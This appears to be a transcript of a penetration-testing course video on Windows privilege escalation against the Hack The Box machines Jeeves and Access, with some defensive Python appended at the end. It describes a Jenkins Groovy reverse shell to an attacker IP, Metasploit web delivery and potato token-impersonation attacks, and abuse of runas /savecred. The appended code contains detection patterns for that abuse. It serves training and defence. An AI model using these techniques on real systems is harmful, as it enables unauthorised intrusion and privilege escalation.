that in the next video but very common attack that I see in internal assessments still to this day and we'll talk about why it's bad why it's dangerous and then we'll see how to escalate this box as well so I will catch you over in the next video when we do the low level user walkthrough for Jeeves all right let's take a look at our mmap results so we've got Port 80 open for HTTP and we've got Port 50 000 open also for http and then we've got RPC and SMB open so we have a few different paths we can take and to save time I'm going to take us down the correct path but we could look at 445 we could do SMB clients see if we can connect anonymously we can do uh more information gathering or more enumeration on 445 see what service is running or what version of samba's running or SMB is running and see if that has any exploits available for it but here in this case we're just going to run off of Port 80 and Port 50 000. so let's go navigate to those I'm just going to copy this real quick let's navigate to those and see Let's uh let's do this we'll navigate there and then we'll also do an http and we'll do 50 000. 
Okay so we've got two things here we've got Ash Jeeves and when we have a web page like this we're probably just going to click around see what we've got but we can see that's just giving us a pound sign and here we could try to search something and it throws up this air which this would absolutely be a finding on a pen test so we're seeing some sort of SQL error and it's trying to tell us maybe hey there's some sort of SQL injection here and it's giving us a SQL server and all this other stuff except if we drag this this is actually just an image so it's just a trick page there's nothing actually here um so our options here and if we come to 50 000 we can see there's a powered by Jetty which takes us to Jetty and there's nothing there either so if we're sure that 80 000 or if we're sure that uh Port 80 is our path then we need to explore maybe directory busting here and see where we can get so what we're going to do is we're just going to run der Buster against 50 000. and we would say durbuster and like this or you can just run dirtbuster but then you come in here and you would specify so we would just say hey I want to run it against this and I'm going to say go faster I'm going to give it a word list so I like to actually use the built-in word list under user share and then word list and then there is dirt Buster in here there's actually a der Buster under the user share as well that you can use and then the medium lowercase list is what I use so I'm just going to leave it with PHP and we're just going to let it run for the sake of this walkthrough in the sake of this video we're just going to kind of skip ahead a little bit we'll look at the results later on but what we're going to find here is we're going to find an Ask Jeeves page this is going to be something like this ass Jeeves and we're going to go ahead and find that directory and this is where realism kind of comes into play I find Jenkins servers all the time and I find jaken servers now we have a 
login so we could go try to log in with weak password or credentials but I see Jenkins servers like this where you have builds out there and you have all sort of information on um like leak credentials all kinds of things user usernames I see API tokens I see all kinds of stuff hiding in Jacob servers on internal pen test so if you're watching this and you have a Jacob server secure your Jenkins server but okay if we go to manage Jenkins there's a nice little feature in here and that is the script console now Jenkins is very well known for having a script console in here I'm going to go ahead and just hit cancel on this and you can actually see I'm going to pause or stop this you can see that ashgs has been found in a directory so we have asked Jeeves it's already found that I'm going to go ahead and just stop this um so we have this script console in the script console runs groovy now groovy is a language okay so what if we did something like Google and we said groovy reverse shell pure groovy Java reverse shell I can't make this up it is honestly this easy so let's copy this and this will allow us to get a reverse shell with Jenkins so please don't have your script console open because this is just nasty so 10.10.14.3 is where I'm sitting Port 8044 is fine by me so I'm just going to open up a new window and I'm going to say netcat and vlp 8044 and I'm just going to run this and boom it's it's that easy it's really that easy so watch out for your Jenkins instances again and if you're a pen tester look for those because they are valuable valuable resources so here we are we are on this machine and I'm going to kind of do a little bit of the enumeration now and then we'll move on in the next video and we'll actually do the S collection so if we're on this machine the first thing I want to do is I want to just say who am I right okay we are uh who am I and we are this Jeeves kosuki I don't know how to say it uh we could do the quick who am I slash priv since we know 
that's kind of what we're looking at at this point and you kind of already know because of the section where we're going to we're going to go on this path but we can see here that the impersonate privilege is enabled so our Wheels should start spinning hey uh impersonate privilege maybe I've got something here so what we're going to do is we could also pull down just to show you we could pull down system info and save this out to a file and run our Windows privilege Checker right so I can come here copy this and then let's just go ahead and say uh it's actually here let me do this we'll go to a new tab here and I'll just say G edit sysinfo dot text even though I've already got this in here paste and Save and then I don't ever remember the command because it involves a little bit of stuff so I just type in history and then I say grep windows xplay suggestor and I just copy one of these so we'll just say windows X-Play suggestor and then it's got your database that you used last time we were doing this to the enumeration section I'm going to paste it in here and it's going to run this and we're going to see what sort of things come up so I'll make this a little bit bigger for here and if we scroll through this there's a lot of different things right but the Hot Potato comes up rotten potato comes up Tater comes up these are all potato attacks so if you're seeing this this is one of the easiest ways to get escalation on a system we have things for Internet Explorer but those aren't really a Microsoft Edge those aren't really what we're after here um if I see a potato attack I'm going to try that first so it's something to be thinking out and thinking for but I mean you have all kinds of attacks here so this is something that you should run pretty much right away and see what you can get you could also drop win Peas on this machine and run winpies see what that pulls back it's going to pull back a lot of the same so don't be afraid to to look through some of these see 
where you can get escalation now the other thing that we're going to do because we're doing a potato attack is we're going to run Metasploit for this one this is the most common and easiest way to do it so that's how we're going to perform it we're going to go through and we're going to go ahead and just get a Metasploit shell really quick so I'm going to say is msf console and we're going to do a web delivery so we're going to go ahead and just say use multi or use exploit multi-script web delivery and here's how we're going to set this up we're going to say options and we have targets down here we can go ahead and show targets we're not going to use Python unless python was on the machine we're just gonna go ahead and go for Powershell because this is going to give us a Powershell command to run and it's going to run it for us so we're just going to go ahead and say set Target Two and then we're going to have to change the payload because the payload is also uh python now I'm going to set this payload to Windows interpreter reverse TCP and why am I doing that I'm doing that because I tried x64 on this when I went through this the first time and it did not work so x64 does not work we're actually going to have to just get a lower level shell and go from there so we're going to get an x86 shell and if we need to migrate we will but for now let's just go ahead and do this and then we're going to set the L host so my L host is 10.10.14.3 and my server host is going to be 10.10.14.3 as well if we type options one more time we should have all the settings set so the server host is set our lhost is set our payload is set and our exploit Target is set to Powershell and I'm just going to run this and it's going to give us this Powershell command to run the job is already started in the background so we don't have to worry about anything and then all we got to do is come into here and just paste this hit enter and hopefully the magic works over here okay it's starting to 
fire we should get a shell there we go so now we'll just type in sessions one and open up our session and here we can do a quick get uid see where the same user we could do the sys info and see that we are x86 on 64 architecture so we might need to migrate and we can also do a git cribs we could say hey what get prebs do we have so this is The Interpreter way of doing it again we see this in person a privilege this is what we're after now we could run the post that allow us Post multi Recon and then local exploit suggestor just like that and this is going to do that same type of checking it's going to see what's available to us and you're going to see that there are a couple of built-in potato attacks as well so let's go ahead and let this run really quick actually what we'll do is let this run we'll stop the video here and we'll go ahead and move on in the next video and we'll actually start the escalation process so take a look at what's here you can see juicy this is a potato attack reflection also potato attack so two potato attacks right here go ahead pause now meet me in the next video when we actually start working on the escalation so I'll catch you over in the next video all right now let's say background on this session and we should still be in our ms-16075 reflection so quick pause after I recorded this I realized that I went through this on my own once and was already in this reflection so go ahead and type in use exploit Windows local ms16075 reflection here this is what you're going to want to type in make sure you do that and then follow along with the rest of the video so sorry about this small confusion here and let's go ahead and continue the video what we're going to go ahead and do is we're going to just do options really quick and I want to make sure that we have all the settings the same so make sure that your L host is set if it's not sometimes it sets to your eth0 instead of your ton zero make sure that your L Port is set to all fives 
because currently our session one is running on all fours so let's make sure that we set it to all fives or any port of your choosing and lastly let's go ahead and run a 64-bit meterpreter reverse TCP and hopefully this will work for us so go ahead make sure you set your payload make sure you set your L host make sure you set your L port make sure your session's correct and go ahead and run this let's see what happens okay and we get a interpreter session beautiful now let's load incognito let's list out our tokens and you can see now we have the impersonate token so here we go I'm going to copy this and we're just going to say impersonate token and I'm just going to paste this like this you can see we have impersonated user Authority system I'm going to drop into a shell okay and then I'm gonna CD over we actually we could say who am I real quick we are Authority system I'm going to CD over to see users administrator and then CD to desktop do a quick dir and you can see that there is this file hm.txt now if you're used to hack the box there should be a root flag here so if we type out hm.txt we see there's no root flag so we're going to do one more video here figure out how to find this root flower we're going to talk about alternate data streams and then we'll cap out this section of the course so I'll catch you in the next video we briefly talk about alternate data streams find the root flag and own this machine completely so catch you over there all right let's talk about alternate data streams I actually think this is super important so what's an alternate data stream well there's a great blog out there by Malwarebytes that kind of helps explain it and I'll link it in the course resources basically you have two types of data streams you have a like a primary or a regular data stream and then you also have a secondary or alternate data stream and this goes into a lot of detail on data streams how to retrieve them what you're looking for ETC what we need to know 
is your regular data stream is like your primary text inside of a file that's considered your primary data stream your alternate is a way to hide information within a file so we can hide data okay so let's take a look at how data actually is hidden here so we did a dur and we see okay the hm.text is here but we could take a deeper look it says look deeper so let's do that we can do a dur slash R like this and now look we've got dot text root dot text and then the dollar sign data so if we want to take a look at what's hiding in here we can do a lot of different things anything in that malware by its blog is perfect there's a tool from CIS internals called stream or streams that you can utilize there's Powershell that you can utilize you can also just do something like this you could say more and then you could just paste this in here and you can see that here is your root flag so always be cautious of an alternate data stream this is a way to hide information and something to know about so I thought this one was really cool just want to throw it out there you might see this show up sometime on a capture the flag or some sort of hack the box or any sort of machine like that a really neat trick so make sure you're aware of this and just keep in your notes so that's it in the next section we're going to go ahead and talk about git system briefly and then we're going to move on and start talking some even more prevask I'm really excited about it so catch you over in the next section okay so this segment is a hands-off segment and it's just to show you one of the features of Metasploit now this is just a shell that I have on a local Windows 7 machine here that I called Windows 7 provesque now there is a built-in tool that I have not shown you yet because I wanted to get through the impersonation and the other who am I privileges just so you understand those privileges first so now that we have an understanding of that I can show you this technique now the technique is 
called get system now we run it and you can see that it tries to elevate the system in a few different ways it tries two different types of name pipe impersonations and it tries token duplication now if we do a git system Dash h it tells you hey you can run this and run all three as zero or we can do a dash T and run one or three or two or however we want to do this now what is happening when we run this git system and when should we attempt it that's important as well if you're on a box say just Capture the Flag type box running git system never hurts if I pop onto a machine and I run git system and it works great game over easy win okay if you're in a real environment not so much and this might come up in an interview where you might need to know what this is actually doing so it doesn't hurt to understand so I kind of wanted to point this out it's just a real quick easy way to try to get win but you should know what you're doing so there's a great blog from Cobalt strike that talks about what happens when you type git system now there are two techniques that are pretty much the same there is the name pipe impersonation okay so we are impersonating and we're going to try to impersonate into system all right so it's going to create a pipe when it is spawned the command.exe connects to interpreter's name pipe interpreter has the opportunity to impersonate that security context that's Technique One technique two identical except that it drops into disk so it drops on disk so it is recommended not to run this because this can actually get caught by uh antivirus you don't want to run this or get detected uh then I would just skip running two completely but it does run on disk drops a dll to the disk and schedules a run dll 32 exe as a service to try to elevate here now technique 3 takes advantage of something else the SC debug privilege okay so it Loops through all the open services that is running and tries to find one running a system and that you have permissions 
to inject into. So if you have all this enabled here then you're able to inject, and it's going to attempt to get SYSTEM for you as well. So you should have a little bit of a deeper understanding as to what's going on, as opposed to just, like, hey, firing this off and letting it run. So if you're ever asked, you know, "what are you doing when you run getsystem?", say, hey, there are two different types of named pipe impersonation, one's in memory and one's actually on disk, and I probably should run that one, and then number three is this token duplication, and it requires the SeDebugPrivilege to be enabled, and you can go into a lot more depth. Okay, so keep going into depth on these, learn, read, take good notes, understand these at a deeper level, but don't just fire willy-nilly without knowing what you're doing and the reasoning behind it. So this is getsystem, a great technique to try, especially on, again, these Capture the Flag systems, but avoid just running this on any system that you have. If you're doing a pen test, for example, this could actually crash a machine, so you should be very careful when you're running this. So that's it for this lesson, I'll catch you over in the next section.

All right, in this section we're going to be exploring the runas command. Now, this is absolutely something you should be checking for when you log on to a Windows machine as a low-level user. What the runas command does is it allows us to run a command as somebody else, so in this instance we're going to be using runas as the administrator. We're going to do that on the box that you're going to be seeing here soon, so it's going to be our premise technique, and let's go ahead and talk about that. So on Hack The Box we're going to be utilizing the box Access, which is at 10.10.10.98, so go ahead and start that and get your scan going. Now, the one thing that I can tell you is, if you're looking to explore this on your own, and you should be, go ahead and note that you're going to be looking for cmdkey /list. That is the command that's going to look for stored credentials on a machine. So if you do get a low-level shell and you want to consider moving forward, go ahead and run cmdkey /list. However, a tool like winPEAS or even a tool like JAWS, some tools along those lines, basic PowerShell scripts, will run and will tell you this. Now, this box is a little older, so you're going to have to find the right tools that work, but if you do run that tool it will tell you as well. But we're going to utilize cmdkey /list to just view this on our own. So those are some big hints on how we're going to take down this box, but now my challenge to you is to get the low-level user first and then we'll work through this. So I'll catch you in the next video as we walk through the low-level user and hopefully gain access to this machine.

So here we are, we have our nmap scan back and we have three ports open: we've got FTP, we've got telnet and we've got HTTP, that's it. So we can go out really quick to the interwebs and see if HTTP has anything for us. So I'll just create a new tab, hit enter, and we've got this MegaCorp, that's it. We've got this page here, you can view the source and see if there's anything here. Um, I've got it selected, sorry, view the page source, there's nothing really here. If there is an exploit this way we're going to have to look into either what's running on the back end, here we can see it's 7.5, Windows Server, uh, maybe there's directory busting we need to do, etc., but we're going to explore the other paths first. So what I'm going to do is I'm going to open up a new tab and I'm just going to see if FTP is open, so we'll FTP to this machine and I'm going to try anonymous login. The only other option is we could try logging in with telnet and seeing if we can get in that way, but here we have anonymous login, so I'm going to go ahead and just say ls and we can see we've got a backups and an engineer folder here. So I'm going to switch over to binary. When we go into FTP we are typically in ASCII by default, now we have transfer issues sometimes with ASCII, so it's always good to switch to binary when you're transferring files. Now we can't do the recurse on, I actually tried that and it's saying hey, invalid command, so we're just going to go into both of these and we're just going to grab the files that are in them. So if we ls there's a backup.mdb, so we could say get backup.mdb, just like that, it'll grab the file, and then we're going to do this again for the other file. So we'll cd, and then we're going to go into cd engineer, ls, and we're going to grab this access control, so we'll just say Access Control.zip, just like that, and now we have both of those. So let's go ahead and explore what we just grabbed. If I go to my files and my downloads I've got this Access Control.zip, and I can see that there's a PST here, which is an email file, right? So this is commonly associated with something like Microsoft Office, but it doesn't have to be, now this can be opened with other tools. Same thing with this MDB, this is an Access database, or a database. Now the way I'm going to access these here coming up is going to be using Microsoft Office, however there are alternatives and I will present those to you. They are not installed on Kali, you'll have to take that your own path. So what you can utilize to read this backup file here, and I'll type this out for you, is a tool called mdb-sql, and just run it against backup.mdb, and then you can also use a tool for the PST, readpst. So those are the two tools that you should use if you want to use it in a complete Linux format, otherwise as long as you have access to opening these files you should be okay. So what I've done is I've taken these files and I've moved them over and I'm just going to show you what they look like opened up. So let me open up the Access database, which is the backup database, I'm going to bring this over and you're going to see there's a bunch of tables in here. Now you have to kind of enumerate through these tables and see what you can find, but if we scroll through there is the auth user table here and it gives us a few different categories: it gives us a username, password, last login, etc. Now we have admin admin, backup admin admin, and then we have engineer and access for you at security. So I'm going to copy this password, and this is a lot of trial and error, so if you did this box on your own and it took you a while to find this, that's absolutely fine. I remember doing this box back when it was a live box on Hack The Box and it took me a couple of days to actually solve this, just because there's a lot of enumeration to go through and it's not the easiest of boxes, just because of the hurdles you have to go through. So let's go ahead and just minimize this and we're gonna go and try to access this other file. Now, I tried to telnet originally, and if you tried to telnet that's absolutely fine, you could say hey, admin or security or whatever user, I'm gonna try to log in with them and see if it works. Unfortunately it didn't work, so I'm going to go into our files and then I'm going to go to the Access Control.zip and I'm going to try to migrate this access control over, and I'm going to paste this password that we found, and I've already got the file here but we'll just say replace. So then this Access Control.pst comes in. I've gone ahead and loaded that Access Control PST into Outlook and I've just grabbed the file, so here is the email. There's one email that was sitting in there, from John at megacorp.com to security at accesscontrollsystems.com, and it says the password for the security account has been changed to this password, so please ensure to pass on to your engineers. So I'm going to copy this password, and now we know also that the username is security. So again, kind of went through that a little bit quick, but what has happened here is we had anonymous login, right? Anonymous login on FTP permitted us to find these backup files. We found the backup files and we utilized the database to find the auth table, the auth table allowed us to access this PST here, we extracted the PST and inside the PST was an email. So this box is called Access, it's just a hint that we had to use Access to actually access, that's fun to say. Okay, so anyways, what we're going to do now is we're going to telnet into the machine, or at least attempt to telnet into the machine, so we'll say telnet, and we're going to do, we'll do a -l for the username, which is security, we're going to say 10.10.10.98. Okay, and it's a little slow as you can see. All right, let's paste the password now, or let's actually just paste, we'll say security and then we'll paste the password, see if this lets us log in. Okay, we are in, so you see user security. So this is the baseline here: we have gotten a user account. All we want to do in this escalation attempt moving forward is we want to be able to get a shell, so this is your challenge for the next video. We want to get a complete shell, we want to take that shell, we want to do the enumeration of the credentials, so we're going to try to find that cmdkey /list. In order to run that we need a full shell, and then we'll go ahead and see if we can't download the root.txt. That is really the challenge here; we're not going to try to escalate, as I feel like that's going to be out of the scope of this course, at least the escalation into the administrative account is going to be out of scope, but the runas is very, very in scope for the escalation here. So we're going to go ahead and try to utilize the runas to grab the root.txt off of the administrative desktop. Okay, so I will see you guys in the next video as we try to achieve that.

All right, so here we are at our telnet session. Now, when we spoke in the last video we talked about cmdkey /list being the big hint of what we need to do, and when we talk about methodology, this is just another tool to add to your toolkit. From here there's a lot of different paths that we can take: we can utilize this telnet session, which is a shell, and utilize this to navigate around, perhaps we can try to run some sort of PowerShell or run a tool like winPEAS or like PowerUp, etc., see what the lay of the land is. We can absolutely even just look for hints around the environment itself, we can navigate, see if there's anything in the security folder, or this user of security, their desktop, documents, if there's anything in the program files. We're going to do our due diligence and kind of just work down a checklist, and that's the point where we're at, is we're just working down a checklist. So even though I show you the escalation path here, it's just to show you a tool for your toolkit, so keep this in mind. Again, from the very first or second video I told you to take good notes, add this to your notes, okay. So what we're looking at is cmdkey /list. If I could type cmdkey /list, you're going to see here that we have currently stored credentials for the target of Access administrator, so that's great, and we have a domain password stored. So we're going to use a tool called runas.exe, which is built into Windows. Now I'm going to copy a command, because you just saw what happened when I fat-fingered this, and I fat-finger all the time, so I'm going to copy the command and then you can just copy this as well while I'm speaking about it. So what the command is, is we're going to run System32 runas.exe and we're going to say hey, I want to use the user Access administrator, and with this user of Access administrator I want to run savecred. Savecred is just hey, I'm going to use the saved credentials that are here for me. We're going to run cmd.exe /c and then we're going to just copy over the root.txt, we're going to type it out, this is basically like an echo command, we're going to type out the command and drop it into the security folder as root.txt. Now there's a lot of different ways that we can do this, we could say hey, I want to run cmd.exe and just run a copy and we can copy the file over, so we have options, right? So the type command is just one way of doing this. Now we're using full paths here, there's a chance that we could just use runas.exe and cmd.exe, but it's always good to just practice with using full paths in case the path isn't there. So if you were to come in here and try this and it doesn't give you any inclination of whether or not it's working, or whether or not the runas is working at all, then you might lose your mind and say, you know, I'm sure this is it but maybe there's a different path out there, and just abandon ship. So you don't want to do that, you want to make sure that you call the full paths just to be safe. So here we are, if we hit enter on this and we just now type in dir, you can see we've grabbed this root.txt, and we could prove concept by just doing a type here. If we say type root.txt and see if this works on the admin, we should get access denied. So access is denied, but now we've copied that file. Why? Because we're acting as the administrator on this machine, and that's really the big takeaway: if you have the ability to runas, you have a lot of flexibility, you can run different commands. We ran a cmd.exe with a /c; imagine the flexibility and types of commands that you can run. Just because we did a type here, or we could do a copy, doesn't mean we can't do other commands here that could be beneficial to us. So hopefully that gets your wheels spinning as to how powerful this is. You could think of this just as like a sudo command, I'm going to run sudo as this user, so if you're familiar with Linux, same thing, we're running as a user, the only benefit here is we don't have to have the credentials, they're stored for us, so that's super nice. So that's it for this lesson, I'll catch you over in the next section.

Congratulations, you have made it to the end of this course. So again, just to recap, this was the first three or so hours of this seven-hour course. If you come through and you want to purchase it, you have the ability to come through and learn much more, including registry attacks, executable files, startup applications, etc. All this material is included in the course purchase, and again, even if you don't purchase, if you like the video please do drop a like, please consider subscribing to the channel. We do drop full course videos quite often, along with other hacking-related and cybersecurity-related materials, so we'd love to have you as a subscriber. With that being said, my name is Heath Adams and I really thank you for joining me through this course. Until next time, peace out.
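A defender-side check for the two things the runas lesson above hinges on, added here as an example and not code from the course: a parser for `cmdkey /list` output that reports which stored entries `runas /savecred` can reuse, and a tagger over process command lines of the kind a process-creation log carries. The sample output, the LegacyGeneric entry, the command lines and the ACCESS\Administrator account spelling are constructed; the `Domain:interactive=` target form is the one cmdkey prints for an interactive domain credential.

```python
import re

# Constructed sample of `cmdkey /list` output, modelled on the transcript's
# Access box (a stored Domain Password for the administrator account).
SAMPLE_CMDKEY_OUTPUT = r"""
    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: security
"""

# Constructed process-creation command lines (the shape a 4688 or Sysmon
# event carries); the first is the runas /savecred usage from the lesson.
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt"',
    r"C:\Windows\System32\cmdkey.exe /list",
    r"C:\Windows\System32\notepad.exe C:\Users\security\notes.txt",
]

def parse_cmdkey_list(text):
    # Each stored credential starts with a Target: line, then Type: and User:.
    creds, cur = [], None
    for line in text.splitlines():
        m = re.match(r"\s*(Target|Type|User):\s*(.+)", line)
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2).strip()
        if key == "target":
            cur = {"target": val, "type": "", "user": ""}
            creds.append(cur)
        elif cur is not None:
            cur[key] = val
    return creds

def reusable_by_runas(creds):
    # Interactive Domain Password entries are the ones runas /savecred consumes.
    return [c for c in creds if c["type"] == "Domain Password"
            and c["target"].lower().startswith("domain:interactive=")]

RUNAS_SAVECRED = re.compile(r"runas(\.exe)?\b.*/savecred", re.IGNORECASE)
CMDKEY_LIST = re.compile(r"cmdkey(\.exe)?\s+/list", re.IGNORECASE)

def flag_cmdlines(cmdlines):
    # Tag lines that enumerate (cmdkey /list) or consume (runas /savecred) saved creds.
    tags = [("runas_savecred", RUNAS_SAVECRED), ("cmdkey_enum", CMDKEY_LIST)]
    return [(tag, c) for c in cmdlines for tag, rx in tags if rx.search(c)]
```

Run against real `cmdkey /list` output on a host, any entry `reusable_by_runas` returns is one that should be removed (`cmdkey /delete`) unless a business need for it is documented.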
Info
Channel: The Cyber Mentor
Views: 38,267
Id: uTcrbNBcoxQ
Length: 191min 44sec (11504 seconds)
Published: Fri May 05 2023